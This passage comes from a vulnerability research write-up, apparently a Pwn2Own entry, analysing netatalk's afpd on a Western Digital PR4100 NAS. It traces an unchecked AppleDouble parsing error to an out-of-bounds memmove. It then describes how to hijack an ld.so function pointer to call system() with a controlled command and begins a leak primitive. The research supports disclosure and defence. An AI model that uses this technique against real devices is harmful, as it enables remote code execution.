 * Start a DSI session, fork an afpd process
 *
 * @param childp    (w) after fork: parent return pointer to child, child returns NULL
 * @returns             0 on sucess, any other value denotes failure
 */
int dsi_getsession(DSI *dsi, server_child_t *serv_children, int tickleval, afp_child_t **childp)
{
  ...
  switch (pid = dsi->proto_open(dsi)) { /* in libatalk/dsi/dsi_tcp.c */

The dsi_tcp_open() function accepts a client connection, creates a subprocess with fork() and starts initialising the DSI session with the client.

Teaser: That will be useful for exploitation.

/* accept the socket and do a little sanity checking */
static pid_t dsi_tcp_open(DSI *dsi)
{
    pid_t pid;
    SOCKLEN_T len;

    len = sizeof(dsi->client);
    dsi->socket = accept(dsi->serversock, (struct sockaddr *) &dsi->client, &len);
    ...
   if (0 == (pid = fork()) ) { /* child */
        ...
    }

    /* send back our pid */
    return pid;
}

Back into dsi_getsession(), the parent afpd sets *childp != NULL whereas the forked child afpd handling the client connection sets *childp == NULL

//netatalk-3.1.12/libatalk/dsi/dsi_getsess.c
/*!
 * Start a DSI session, fork an afpd process
 *
 * @param childp    (w) after fork: parent return pointer to child, child returns NULL
 * @returns             0 on sucess, any other value denotes failure
 */
int dsi_getsession(DSI *dsi, server_child_t *serv_children, int tickleval, afp_child_t **childp)
{
  ...
  switch (pid = dsi->proto_open(dsi)) { /* in libatalk/dsi/dsi_tcp.c */
  case -1:
    /* if we fail, just return. it might work later */
    LOG(log_error, logtype_dsi, "dsi_getsess: %s", strerror(errno));
    return -1;

  case 0: /* child. mostly handled below. */
    break;

  default: /* parent */
    /* using SIGKILL is hokey, but the child might not have
     * re-established its signal handler for SIGTERM yet. */
    close(ipc_fds[1]);
    if ((child = server_child_add(serv_children, pid, ipc_fds[0])) ==  NULL) {
      LOG(log_error, logtype_dsi, "dsi_getsess: %s", strerror(errno));
      close(ipc_fds[0]);
      dsi->header.dsi_flags = DSIFL_REPLY;
      dsi->header.dsi_data.dsi_code = htonl(DSIERR_SERVBUSY);
      dsi_send(dsi);
      dsi->header.dsi_data.dsi_code = DSIERR_OK;
      kill(pid, SIGKILL);
    }
    dsi->proto_close(dsi);
    *childp = child;
    return 0;
  }
  ...
  switch (dsi->header.dsi_command) {
  ...
  case DSIFUNC_OPEN: /* setup session */
    /* set up the tickle timer */
    dsi->timer.it_interval.tv_sec = dsi->timer.it_value.tv_sec = tickleval;
    dsi->timer.it_interval.tv_usec = dsi->timer.it_value.tv_usec = 0;
    dsi_opensession(dsi);
    *childp = NULL;
    return 0;

  default: /* just close */
    LOG(log_info, logtype_dsi, "DSIUnknown %d", dsi->header.dsi_command);
    dsi->proto_close(dsi);
    exit(EXITERR_CLNT);
  }
}

We are now back into dsi_start(). For the parent, nothing happens and the main() forever loop continues waiting for other client connections. For the child handling the connection, afp_over_dsi() is called. This function reads the AFP packet (which is the DSI payload), determines the AFP command and calls a function pointer inside the afp_switch[] global array to handle that AFP command.

//netatalk-3.1.12/etc/afpd/afp_dsi.c
/* -------------------------------------------
 afp over dsi. this never returns.
*/
void afp_over_dsi(AFPObj *obj)
{
    ...
    /* get stuck here until the end */
    while (1) {
        ...
        /* Blocking read on the network socket */
        cmd = dsi_stream_receive(dsi);
        ...
        switch(cmd) {
        ...
        case DSIFUNC_CMD:
            ...
                /* send off an afp command. in a couple cases, we take advantage
                 * of the fact that we're a stream-based protocol. */
                if (afp_switch[function]) {
                    dsi->datalen = DSI_DATASIZ;
                    dsi->flags |= DSI_RUNNING;

                    LOG(log_debug, logtype_afpd, "<== Start AFP command: %s", AfpNum2name(function));

                    AFP_AFPFUNC_START(function, (char *)AfpNum2name(function));
                    err = (*afp_switch[function])(obj,
                                                  (char *)dsi->commands, dsi->cmdlen,
                                                  (char *)&dsi->data, &dsi->datalen);

The afp_switch[] global array is initialized to the preauth_switch value initially which consists of only a few handlers available pre-authentication. We can guess it is set to the postauth_switch value once the client is authenticated. This gives access to a lot of other AFP features.

//netatalk-3.1.12/etc/afpd/switch.c
/*
 * Routines marked "NULL" are not AFP functions.
 * Routines marked "afp_null" are AFP functions
 * which are not yet implemented. A fine line...
 */
static AFPCmd preauth_switch[] = {
    NULL, NULL, NULL, NULL,
    NULL, NULL, NULL, NULL,					/*   0 -   7 */
    NULL, NULL, NULL, NULL,
    NULL, NULL, NULL, NULL,					/*   8 -  15 */
    NULL, NULL, afp_login, afp_logincont,
    afp_logout, NULL, NULL, NULL,				/*  16 -  23 */
    NULL, NULL, NULL, NULL,
    NULL, NULL, NULL, NULL,					/*  24 -  31 */
    NULL, NULL, NULL, NULL,
    NULL, NULL, NULL, NULL,					/*  32 -  39 */
    NULL, NULL, NULL, NULL,
    NULL, NULL, NULL, NULL,					/*  40 -  47 */
    NULL, NULL, NULL, NULL,
    NULL, NULL, NULL, NULL,					/*  48 -  55 */
    NULL, NULL, NULL, NULL,
    NULL, NULL, NULL, afp_login_ext,				/*  56 -  63 */
    ...
};

AFPCmd *afp_switch = preauth_switch;

AFPCmd postauth_switch[] = {
    NULL, afp_bytelock, afp_closevol, afp_closedir,
    afp_closefork, afp_copyfile, afp_createdir, afp_createfile,	/*   0 -   7 */
    afp_delete, afp_enumerate, afp_flush, afp_flushfork,
    afp_null, afp_null, afp_getforkparams, afp_getsrvrinfo,	/*   8 -  15 */
    afp_getsrvrparms, afp_getvolparams, afp_login, afp_logincont,
    afp_logout, afp_mapid, afp_mapname, afp_moveandrename,	/*  16 -  23 */
    afp_openvol, afp_opendir, afp_openfork, afp_read,
    afp_rename, afp_setdirparams, afp_setfilparams, afp_setforkparams,
    /*  24 -  31 */
    afp_setvolparams, afp_write, afp_getfildirparams, afp_setfildirparams,
    afp_changepw, afp_getuserinfo, afp_getsrvrmesg, afp_createid, /*  32 -  39 */
    afp_deleteid, afp_resolveid, afp_exchangefiles, afp_catsearch,
    afp_null, afp_null, afp_null, afp_null,			/*  40 -  47 */
    afp_opendt, afp_closedt, afp_null, afp_geticon,
    afp_geticoninfo, afp_addappl, afp_rmvappl, afp_getappl,	/*  48 -  55 */
    afp_addcomment, afp_rmvcomment, afp_getcomment, NULL,
    ...
};

Here it is interesting to note that the Western Digital PR4100 has a Public AFP share by default which is available without requiring user authentication. This means we can reach all these post-authentication handlers as long as we target the Public share. It is also worth mentioning that the same Public share is available over the Server Message Block (SMB) protocol to the guest user, without requiring any password. It means we can read / create / modify any files over AFP or SMB as long as they are stored in the Public share.

The AFP command we are interested in is "FPOpenFork", which is handled by the afp_openfork() handler. As detailed previously, a fork file is a special type of file used to store metadata associated with a regular file. The fork file is stored in the AppleDouble file format. The afp_openfork() handler finds the volume and fork file path to open and call ad_open() ("ad" stands for AppleDouble).

//netatalk-3.1.12/etc/afpd/fork.c
/* ----------------------- */
int afp_openfork(AFPObj *obj _U_, char *ibuf, size_t ibuflen _U_, char *rbuf, size_t *rbuflen)
{
    ...
    struct adouble  *adsame = NULL;
    ...
    if ((opened = of_findname(vol, s_path))) {
        adsame = opened->of_ad;
    }
    ...
    if ((ofork = of_alloc(vol, curdir, path, &ofrefnum, eid, adsame, st)) == NULL)
        return AFPERR_NFILE;
    ...
    /* First ad_open(), opens data or ressource fork */
    if (ad_open(ofork->of_ad, upath, adflags, 0666) < 0) {

The ad_open() function is quite generic in that it can open different fork files: a data fork file, a metadata fork file or a resource fork file. Since we are dealing with a resource fork here, we end up calling ad_open_rf() ("rf" stands for resource fork).

NOTE: ad_open() is in libatalk/ folder instead of etc/afpd for the previously discussed code. Consequently, the code we analyse from now on is in libatalk.so.

//netatalk-3.1.12/libatalk/adouble/ad_open.c
/*!
 * Open data-, metadata(header)- or ressource fork
 *
 * ad_open(struct adouble *ad, const char *path, int adflags, int flags)
 * ad_open(struct adouble *ad, const char *path, int adflags, int flags, mode_t mode)
 *
 * You must call ad_init() before ad_open, usually you'll just call it like this: \n
 * @code
 *      struct adoube ad;
 *      ad_init(&ad, vol->v_adouble, vol->v_ad_options);
 * @endcode
 *
 * Open a files data fork, metadata fork or ressource fork.
 *
 * @param ad        (rw) pointer to struct adouble
 * @param path      (r)  Path to file or directory
 * @param adflags   (r)  Flags specifying which fork to open, can be or'd:
 *                         ADFLAGS_DF:        open data fork
 *                         ADFLAGS_RF:        open ressource fork
 *                         ADFLAGS_HF:        open header (metadata) file
 *                         ADFLAGS_NOHF:      it's not an error if header file couldn't be opened
 *                         ADFLAGS_NORF:      it's not an error if reso fork couldn't be opened
 *                         ADFLAGS_DIR:       if path is a directory you MUST or ADFLAGS_DIR to adflags
 *
 *                       Access mode for the forks:
 *                         ADFLAGS_RDONLY:    open read only
 *                         ADFLAGS_RDWR:      open read write
 *
 *                       Creation flags:
 *                         ADFLAGS_CREATE:    create if not existing
 *                         ADFLAGS_TRUNC:     truncate
 *
 *                       Special flags:
 *                         ADFLAGS_CHECK_OF:  check for open forks from us and other afpd's
 *                         ADFLAGS_SETSHRMD:  this adouble struct will be used to set sharemode locks.
 *                                            This basically results in the files being opened RW instead of RDONLY.
 * @param mode      (r)  mode used with O_CREATE
 *
 * The open mode flags (rw vs ro) have to take into account all the following requirements:
 * - we remember open fds for files because me must avoid a single close releasing fcntl locks for other
 *   fds of the same file
 *
 * BUGS:
 *
 * * on Solaris (HAVE_EAFD) ADFLAGS_RF doesn't work without
 *   ADFLAGS_HF, because it checks whether ad_meta_fileno() is already
 *   openend. As a workaround pass ADFLAGS_SETSHRMD.
 *
 * @returns 0 on success, any other value indicates an error
 */
int ad_open(struct adouble *ad, const char *path, int adflags, ...)
{
    ...
    if (adflags & ADFLAGS_RF) {
        if (ad_open_rf(path, adflags, mode, ad) != 0) {
            EC_FAIL;
        }
    }

ad_open_rf() then calls into ad_open_rf_ea():

//netatalk-3.1.12/libatalk/adouble/ad_open.c
/*!
 * Open ressource fork
 */
static int ad_open_rf(const char *path, int adflags, int mode, struct adouble *ad)
{
    int ret = 0;

    switch (ad->ad_vers) {
    case AD_VERSION2:
        ret = ad_open_rf_v2(path, adflags, mode, ad);
        break;
    case AD_VERSION_EA:
        ret = ad_open_rf_ea(path, adflags, mode, ad);
        break;
    default:
        ret = -1;
        break;
    }

    return ret;
}

The ad_open_rf_ea() function opens the resource fork file. Assuming the file already exists, it ends up calling into ad_header_read_osx() to read the actual content, which is in the AppleDouble format:

static int ad_open_rf_ea(const char *path, int adflags, int mode, struct adouble *ad)
{
    ...

#ifdef HAVE_EAFD
    ...
#else
    EC_NULL_LOG( rfpath = ad->ad_ops->ad_path(path, adflags) );
    if ((ad_reso_fileno(ad) = open(rfpath, oflags)) == -1) {
        ...
    }
#endif
    opened = 1;
    ad->ad_rfp->adf_refcount = 1;
    ad->ad_rfp->adf_flags = oflags;
    ad->ad_reso_refcount++;

#ifndef HAVE_EAFD
    EC_ZERO_LOG( fstat(ad_reso_fileno(ad), &st) );
    if (ad->ad_rfp->adf_flags & O_CREAT) {
        /* This is a new adouble header file, create it */
        LOG(log_debug, logtype_ad, "ad_open_rf(\"%s\"): created adouble rfork, initializing: \"%s\"",
            path, rfpath);
        EC_NEG1_LOG( new_ad_header(ad, path, NULL, adflags) );
        LOG(log_debug, logtype_ad, "ad_open_rf(\"%s\"): created adouble rfork, flushing: \"%s\"",
            path, rfpath);
        ad_flush(ad);
    } else {
        /* Read the adouble header */
        LOG(log_debug, logtype_ad, "ad_open_rf(\"%s\"): reading adouble rfork: \"%s\"",
            path, rfpath);
        EC_NEG1_LOG( ad_header_read_osx(rfpath, ad, &st) );
    }
#endif

We have finally reached our vulnerable function: ad_header_read_osx().

Understanding the vulnerability

The ad_header_read_osx() reads the content of the resource fork i.e. interprets it in the AppleDouble file format. Netatalk stores elements of the AppleDouble file format inside its own adouble structure that we will detail soon. ad_header_read_osx() starts by reading the AppleDouble header to determine how many entries there are.

//netatalk-3.1.12/libatalk/adouble/ad_open.c
/* Read an ._ file, only uses the resofork, finderinfo is taken from EA */
static int ad_header_read_osx(const char *path, struct adouble *ad, const struct stat *hst)
{
    ...
    struct adouble      adosx;
    ...
    LOG(log_debug, logtype_ad, "ad_header_read_osx: %s", path ? fullpathname(path) : "");
    ad_init_old(&adosx, AD_VERSION_EA, ad->ad_options);
    buf = &adosx.ad_data[0];
    memset(buf, 0, sizeof(adosx.ad_data));
    adosx.ad_rfp->adf_fd = ad_reso_fileno(ad);

    /* read the header */
    EC_NEG1( header_len = adf_pread(ad->ad_rfp, buf, AD_DATASZ_OSX, 0) );
    ...
    memcpy(&adosx.ad_magic, buf, sizeof(adosx.ad_magic));
    memcpy(&adosx.ad_version, buf + ADEDOFF_VERSION, sizeof(adosx.ad_version));
    adosx.ad_magic = ntohl(adosx.ad_magic);
    adosx.ad_version = ntohl(adosx.ad_version);
    ...
    memcpy(&nentries, buf + ADEDOFF_NENTRIES, sizeof( nentries ));
    nentries = ntohs(nentries);
    len = nentries * AD_ENTRY_LEN;

Then we see it calls into parse_entries() to parse the different AppleDouble entries. What is interesting below is that if parse_entries() fails, it logs an error but does not exit.

    nentries = len / AD_ENTRY_LEN;
    if (parse_entries(&adosx, buf, nentries) != 0) {
        LOG(log_warning, logtype_ad, "ad_header_read(%s): malformed AppleDouble",
            path ? fullpathname(path) : "");
    }

If we look closer at parse_entries(), we see that it sets an error if one of the following condition occurs:

  • The AppleDouble "eid" is zero
  • The AppleDouble "offset" is out of bound
  • When the "eid" does not refer to a resource fork if the AppleDouble "offset" added to the length of the data is out of bound

We know we are dealing with resource forks, so the second condition is interesting. In short, it means we can provide an out of bound AppleDouble "offset" and parse_entries() returns an error, but ad_header_read_osx() ignores that error and continues processing.

//netatalk-3.1.12/libatalk/adouble/ad_open.c
/**
 * Read an AppleDouble buffer, returns 0 on success, -1 if an entry was malformatted
 **/
static int parse_entries(struct adouble *ad, char *buf, uint16_t nentries)
{
    uint32_t   eid, len, off;
    int        ret = 0;

    /* now, read in the entry bits */
    for (; nentries > 0; nentries-- ) {
        memcpy(&eid, buf, sizeof( eid ));
        eid = get_eid(ntohl(eid));
        buf += sizeof( eid );
        memcpy(&off, buf, sizeof( off ));
        off = ntohl( off );
        buf += sizeof( off );
        memcpy(&len, buf, sizeof( len ));
        len = ntohl( len );
        buf += sizeof( len );

        ad->ad_eid[eid].ade_off = off;
        ad->ad_eid[eid].ade_len = len;

        if (!eid
            || eid > ADEID_MAX
            || off >= sizeof(ad->ad_data)
            || ((eid != ADEID_RFORK) && (off + len >  sizeof(ad->ad_data))))
        {
            ret = -1;
            LOG(log_warning, logtype_ad, "parse_entries: bogus eid: %u, off: %u, len: %u",
                (uint)eid, (uint)off, (uint)len);
        }
    }

    return ret;
}

From here, it is useful to know what mitigations are in place to know what we are going to need to bypass and also analyse the code after parse_entries() returns to know what kind of exploitation primitives we can build.

Exploitation

Mitigations in place

Checking the ASLR settings of the kernel:

[email protected] ~ # cat /proc/sys/kernel/randomize_va_space 
2

From here:

  • 0 – Disable ASLR. This setting is applied if the kernel is booted with the norandmaps boot parameter.
  • 1 – Randomize the positions of the stack, virtual dynamic shared object (VDSO) page, and shared memory regions. The base address of the data segment is located immediately after the end of the executable code segment.
  • 2 – Randomize the positions of the stack, VDSO page, shared memory regions, and the data segment. This is the default setting.

Checking the mitigations of the afpd binary using checksec.py:

[*] '/home/cedric/pwn2own/firmware/wd_pr4100/_WDMyCloudPR4100_5.17.107_prod.bin.extracted/squashfs-root/usr/sbin/afpd'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

So to summarize:

  • afpd: randomized
    • .text: read/execute
    • .data: read/write
  • Libraries: randomized
  • Heap: randomized
  • Stack: randomized

Since everything is randomized, we are going to need some kind of leak primitive to bypass ASLR. We still need to investigate if we can trigger a path where an out of bound offset access is useful for exploitation.

Finding good exploitation primitives

Let’s analyse the code in ad_header_read_osx() again. Let’s assume the previously discussed parse_entries() function parses an AppleDouble file where some entries can have offsets pointing out of bound. Let’s see what we can do after parse_entries() returns. We see that assuming the if (ad_getentrylen(&adosx, ADEID_FINDERI) != ADEDLEN_FINDERI) { condition passes, it ends up calling into ad_convert_osx().

    nentries = len / AD_ENTRY_LEN;
    if (parse_entries(&adosx, buf, nentries) != 0) {
        LOG(log_warning, logtype_ad, "ad_header_read(%s): malformed AppleDouble",
            path ? fullpathname(path) : "");
    }

    if (ad_getentrylen(&adosx, ADEID_FINDERI) != ADEDLEN_FINDERI) {
        LOG(log_warning, logtype_ad, "Convert OS X to Netatalk AppleDouble: %s",
            path ? fullpathname(path) : "");

        if (retry_read > 0) {
            LOG(log_error, logtype_ad, "ad_header_read_osx: %s, giving up", path ? fullpathname(path) : "");
            errno = EIO;
            EC_FAIL;
        }
        retry_read++;
        if (ad_convert_osx(path, &adosx) == 1) {
            goto reread;
        }
        errno = EIO;
        EC_FAIL;
    }

As the comment below states, the ad_convert_osx() function is responsible for converting the Apple’s AppleDouble file format to a simplified version of the format that is implemented in Netatalk.

We see that the ad_convert_osx() function starts by mapping the original fork file (in the AppleDouble file format) in memory. Then it calls memmove() to discard the FinderInfo part and to move the rest on top of it.

//netatalk-3.1.12/libatalk/adouble/ad_open.c
/**
 * Convert from Apple's ._ file to Netatalk
 *
 * Apple's AppleDouble may contain a FinderInfo entry longer then 32 bytes
 * containing packed xattrs. Netatalk can't deal with that, so we
 * simply discard the packed xattrs.
 *
 * As we call ad_open() which might result in a recursion, just to be sure
 * use static variable in_conversion to check for that.
 *
 * Returns -1 in case an error occured, 0 if no conversion was done, 1 otherwise
 **/
static int ad_convert_osx(const char *path, struct adouble *ad)
{
    EC_INIT;
    static bool in_conversion = false;
    char *map;
    int finderlen = ad_getentrylen(ad, ADEID_FINDERI);
    ssize_t origlen;

    if (in_conversion || finderlen == ADEDLEN_FINDERI)
        return 0;
    in_conversion = true;

    LOG(log_debug, logtype_ad, "Converting OS X AppleDouble %s, FinderInfo length: %d",
        fullpathname(path), finderlen);

    origlen = ad_getentryoff(ad, ADEID_RFORK) + ad_getentrylen(ad, ADEID_RFORK);

    map = mmap(NULL, origlen, PROT_READ | PROT_WRITE, MAP_SHARED, ad_reso_fileno(ad), 0);
    if (map == MAP_FAILED) {
        LOG(log_error, logtype_ad, "mmap AppleDouble: %s\n", strerror(errno));
        EC_FAIL;
    }

    memmove(map + ad_getentryoff(ad, ADEID_FINDERI) + ADEDLEN_FINDERI,
            map + ad_getentryoff(ad, ADEID_RFORK),
            ad_getentrylen(ad, ADEID_RFORK));

Here it is time to look at the adouble structure. The important fields for us are ad_eid[] and ad_data[]. The adouble structure was already populated when the AppleDouble file was read. So we control all these fields.

//netatalk-3.1.12/include/atalk/adouble.h
struct ad_entry {
    off_t     ade_off;
    ssize_t   ade_len;
};

struct adouble {
    uint32_t            ad_magic;         /* Official adouble magic                   */
    uint32_t            ad_version;       /* Official adouble version number          */
    char                ad_filler[16];
    struct ad_entry     ad_eid[ADEID_MAX];

    ...
    char                ad_data[AD_DATASZ_MAX];
};

The functions/macros used to access the EID offset or length fields, as well as the data content are pretty self explanatory:

  • ad_getentryoff(): get an EID offset value
  • ad_getentrylen(): get an EID length value
  • ad_entry(): get the data associated with an EID (by retrieving it from the above offset)
//netatalk-3.1.12/libatalk/adouble/ad_open.c
off_t ad_getentryoff(const struct adouble *ad, int eid)
{
    if (ad->ad_vers == AD_VERSION2)
        return ad->ad_eid[eid].ade_off;

    switch (eid) {
    case ADEID_DFORK:
        return 0;
    case ADEID_RFORK:
#ifdef HAVE_EAFD
        return 0;
#else
        return ad->ad_eid[eid].ade_off;
#endif
    default:
        return ad->ad_eid[eid].ade_off;
    }
    /* deadc0de */
    AFP_PANIC("What am I doing here?");
}
//netatalk-3.1.12/include/atalk/adouble.h
#define ad_getentrylen(ad,eid)     ((ad)->ad_eid[(eid)].ade_len)
#define ad_setentrylen(ad,eid,len) ((ad)->ad_eid[(eid)].ade_len = (len))
#define ad_setentryoff(ad,eid,off) ((ad)->ad_eid[(eid)].ade_off = (off))
#define ad_entry(ad,eid)           ((caddr_t)(ad)->ad_data + (ad)->ad_eid[(eid)].ade_off)

So we control all the fields in the AppleDouble file format. More precisely, we know we can craft an invalid EID "offset" for all the entries we need, due to the previously discussed parse_entries() unchecked return value. Moreover, we can craft a resource fork of the size we want by having larger data. This means we can effectively control the source, destination and length of the memmove() call to write data we control outside of the memory mapping.

NOTE: the entries we want to target are ADEID_FINDERI and ADEID_RFORK:

    memmove(map + ad_getentryoff(ad, ADEID_FINDERI) + ADEDLEN_FINDERI,
            map + ad_getentryoff(ad, ADEID_RFORK),
            ad_getentrylen(ad, ADEID_RFORK));

The next question that comes to mind is where does the memory mapping gets mapped?

From testing, it turns out that if the fork file is less than 0x1000 bytes, the mapped file is allocated in quite high addresses before uams_pam.so, uams_guest.so and ld-2.28.so mappings. More precisely, the ld-2.28.so mapping is always 0xC000 bytes after the beginning of the mapped file, even if ASLR is in place:

(gdb) info proc mappings 
process 26343
Mapped address spaces:

          Start Addr           End Addr       Size     Offset objfile
      0x5579bb534000     0x5579bb53d000     0x9000        0x0 /usr/local/modules/usr/sbin/afpd
      0x5579bb53d000     0x5579bb571000    0x34000     0x9000 /usr/local/modules/usr/sbin/afpd
      0x5579bb571000     0x5579bb57c000     0xb000    0x3d000 /usr/local/modules/usr/sbin/afpd
      0x5579bb57c000     0x5579bb57d000     0x1000    0x47000 /usr/local/modules/usr/sbin/afpd
      0x5579bb57d000     0x5579bb580000     0x3000    0x48000 /usr/local/modules/usr/sbin/afpd
      0x5579bb580000     0x5579bb5a0000    0x20000        0x0 
      0x5579bcd51000     0x5579bcd72000    0x21000        0x0 [heap]
      0x5579bcd72000     0x5579bcd92000    0x20000        0x0 [heap]
      0x7f6c56e30000     0x7f6c56eb0000    0x80000        0x0 
      ...
      0x7f6c57e02000     0x7f6c57e24000    0x22000        0x0 /lib/libc-2.28.so
      0x7f6c57e24000     0x7f6c57f6c000   0x148000    0x22000 /lib/libc-2.28.so
      0x7f6c57f6c000     0x7f6c57fb8000    0x4c000   0x16a000 /lib/libc-2.28.so
      0x7f6c57fb8000     0x7f6c57fb9000     0x1000   0x1b6000 /lib/libc-2.28.so
      0x7f6c57fb9000     0x7f6c57fbd000     0x4000   0x1b6000 /lib/libc-2.28.so
      0x7f6c57fbd000     0x7f6c57fbf000     0x2000   0x1ba000 /lib/libc-2.28.so
      ...
      0x7f6c58129000     0x7f6c58134000     0xb000        0x0 /usr/local/modules/lib/libatalk.so.18.0.0
      0x7f6c58134000     0x7f6c58177000    0x43000     0xb000 /usr/local/modules/lib/libatalk.so.18.0.0
      0x7f6c58177000     0x7f6c58191000    0x1a000    0x4e000 /usr/local/modules/lib/libatalk.so.18.0.0
      0x7f6c58191000     0x7f6c58192000     0x1000    0x67000 /usr/local/modules/lib/libatalk.so.18.0.0
      0x7f6c58192000     0x7f6c58194000     0x2000    0x68000 /usr/local/modules/lib/libatalk.so.18.0.0
      0x7f6c58194000     0x7f6c581b1000    0x1d000        0x0 
      0x7f6c581b2000     0x7f6c581b3000     0x1000        0x0 /mnt/HD/HD_a2/Public/edg/._mooncake
      0x7f6c581b3000     0x7f6c581b4000     0x1000        0x0 /usr/local/modules/lib/netatalk/uams_pam.so
      0x7f6c581b4000     0x7f6c581b6000     0x2000     0x1000 /usr/local/modules/lib/netatalk/uams_pam.so
      0x7f6c581b6000     0x7f6c581b7000     0x1000     0x3000 /usr/local/modules/lib/netatalk/uams_pam.so
      0x7f6c581b7000     0x7f6c581b8000     0x1000     0x3000 /usr/local/modules/lib/netatalk/uams_pam.so
      0x7f6c581b8000     0x7f6c581b9000     0x1000     0x4000 /usr/local/modules/lib/netatalk/uams_pam.so
      0x7f6c581b9000     0x7f6c581ba000     0x1000        0x0 /usr/local/modules/lib/netatalk/uams_guest.so
      0x7f6c581ba000     0x7f6c581bb000     0x1000     0x1000 /usr/local/modules/lib/netatalk/uams_guest.so
      0x7f6c581bb000     0x7f6c581bc000     0x1000     0x2000 /usr/local/modules/lib/netatalk/uams_guest.so
      0x7f6c581bc000     0x7f6c581bd000     0x1000     0x2000 /usr/local/modules/lib/netatalk/uams_guest.so
      0x7f6c581bd000     0x7f6c581be000     0x1000     0x3000 /usr/local/modules/lib/netatalk/uams_guest.so
      0x7f6c581be000     0x7f6c581bf000     0x1000        0x0 /lib/ld-2.28.so
      0x7f6c581bf000     0x7f6c581dd000    0x1e000     0x1000 /lib/ld-2.28.so
      0x7f6c581dd000     0x7f6c581e5000     0x8000    0x1f000 /lib/ld-2.28.so
      0x7f6c581e5000     0x7f6c581e6000     0x1000    0x26000 /lib/ld-2.28.so
      0x7f6c581e6000     0x7f6c581e7000     0x1000    0x27000 /lib/ld-2.28.so
      0x7f6c581e7000     0x7f6c581e8000     0x1000        0x0 
      0x7ffe86f2b000     0x7ffe86f71000    0x46000        0x0 [stack]
      0x7ffe86fb7000     0x7ffe86fba000     0x3000        0x0 [vvar]
      0x7ffe86fba000     0x7ffe86fbc000     0x2000        0x0 [vdso]
  0xffffffffff600000 0xffffffffff601000     0x1000        0x0 [vsyscall]

This means we could use the memmove() to overwrite some data in one of the mentioned libraries. But what library to target?

While debugging, we noticed that when a crash occurs, if we continue execution, a special exception handler in Netatalk catches the exception to handle it.

More specifically, we overwrote the whole ld-2.28.so .data section and ended up with the following crash:

(remote-gdb) bt
#0  0x00007f423de3eb50 in _dl_open (file=0x7f423dbf0e86 "libgcc_s.so.1", mode=-2147483646, caller_dlopen=0x7f423db771c5 <init+21>, nsid=-2, argc=4, argv=0x7fffa4967cf8, env=0x7fffa4967d20) at dl-open.c:548
#1  0x00007f423dba406d in do_dlopen (Reading in symbols for dl-error.c...done.
[email protected]=0x7fffa4966170) at dl-libc.c:96
#2  0x00007f423dba4b2f in __GI__dl_catch_exception ([email protected]=0x7fffa49660f0, [email protected]=0x7f423dba4030 <do_dlopen>, [email protected]=0x7fffa4966170) at dl-error-skeleton.c:196
#3  0x00007f423dba4bbf in __GI__dl_catch_error ([email protected]=0x7fffa4966148, [email protected]=0x7fffa4966150, [email protected]=0x7fffa4966147, [email protected]=0x7f423dba4030 <do_dlopen>, [email protected]=0x7fffa4966170) at dl-error-skeleton.c:215
#4  0x00007f423dba4147 in dlerror_run ([email protected]=0x7f423dba4030 <do_dlopen>, [email protected]=0x7fffa4966170) at dl-libc.c:46
#5  0x00007f423dba41d6 in __GI___libc_dlopen_mode ([email protected]=0x7f423dbf0e86 "libgcc_s.so.1", [email protected]=-2147483646) at dl-libc.c:195
#6  0x00007f423db771c5 in init () at backtrace.c:53
Reading in symbols for pthread_once.c...done.
#7  0x00007f423dc40997 in __pthread_once_slow (once_control=0x7f423dc2ef80 <once>, init_routine=0x7f423db771b0 <init>) at pthread_once.c:116
#8  0x00007f423db77304 in __GI___backtrace (array=<optimised out>, size=<optimised out>) at backtrace.c:106
#9  0x00007f423ddcd6db in netatalk_panic () from symbols/lib64/libatalk.so.18
#10 0x00007f423ddcd902 in ?? () from symbols/lib64/libatalk.so.18
#11 0x00007f423ddcd958 in ?? () from symbols/lib64/libatalk.so.18
Reading in symbols for ../sysdeps/unix/sysv/linux/x86_64/sigaction.c...done.
#12 <signal handler called>
#13 __memmove_sse2_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:238
#14 0x00007f423dda6fd0 in ad_rebuild_adouble_header_osx () from symbols/lib64/libatalk.so.18
#15 0x00007f423ddaa985 in ?? () from symbols/lib64/libatalk.so.18
#16 0x00007f423ddaaf34 in ?? () from symbols/lib64/libatalk.so.18
#17 0x00007f423ddad7b0 in ?? () from symbols/lib64/libatalk.so.18
#18 0x00007f423ddad9e1 in ?? () from symbols/lib64/libatalk.so.18
#19 0x00007f423ddae56c in ad_open () from symbols/lib64/libatalk.so.18
#20 0x000055cd275c1ea7 in afp_openfork ()
#21 0x000055cd275a386e in afp_over_dsi ()
#22 0x000055cd275c6ba3 in ?? ()
#23 0x000055cd275c68fd in main ()

We can see that it crashes on a call instruction where we control both the first argument and the argument.

(remote-gdb) x /i $pc
=> 0x7f423de3eb50 <_dl_open+48>:	call   QWORD PTR [rip+0x16412]        # 0x7f423de54f68 <_rtld_global+3848>
(remote-gdb) x /gx 0x7f423de54f68
0x7f423de54f68 <_rtld_global+3848>:	0x4242424242424242
(remote-gdb) x /s $rdi
0x7f423de54968 <_rtld_global+2312>:	'A' <repeats 35 times>

Checking ld-2.28.so in IDA, we see that it is due to dl_open() calling the _dl_rtld_lock_recursive function pointer and passing a pointer to the _dl_load_lock lock.

void *__fastcall dl_open(
        const char *file,
        int mode,
        const void *caller_dlopen,
        Lmid_t nsid,
        int argc,
        char **argv,
        char **env)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  if ( (mode & 3) == 0 )
    _dl_signal_error(0x16, file, 0LL, "invalid mode for dlopen()");
  rtld_local._dl_rtld_lock_recursive(&rtld_local._dl_load_lock);

Both the function pointer and the lock argument are part of the _rtld_local global which resides in the .data section.

.data:0000000000028060 ; rtld_global rtld_local
.data:0000000000028060 _rtld_local     dq 0  

This makes it a quite generic method to call an arbitrary function with one argument when we are able to overwrite the ld.so .data section.

NOTE: there was a similar technique (though a bit different) detailed in here.

Our goal is to execute an arbitrary command by overwriting the lock to contain a shell command to execute and overwriting the function pointer with the system() address.

Luckily, we know already that we have controlled data passed to the system() function, so we don’t need to know where it is in memory. However, due to ASLR, we have no idea where the system() function is. So we need some kind of leak primitive to bypass ASLR.

Building a leak primitive

If we look again at the previous backtrace, we see it actually crashed in ad_rebuild_adouble_header_osx(). More specifically we see that the following happens in ad_convert_osx():

  • The original AppleDouble file is mapped in memory with mmap()
  • The previously discussed memmove() is called to discard the FinderInfo part
  • ad_rebuild_adouble_header_osx() is called
  • The mapped file is unmapped with munmap()
//netatalk-3.1.12/libatalk/adouble/ad_open.c
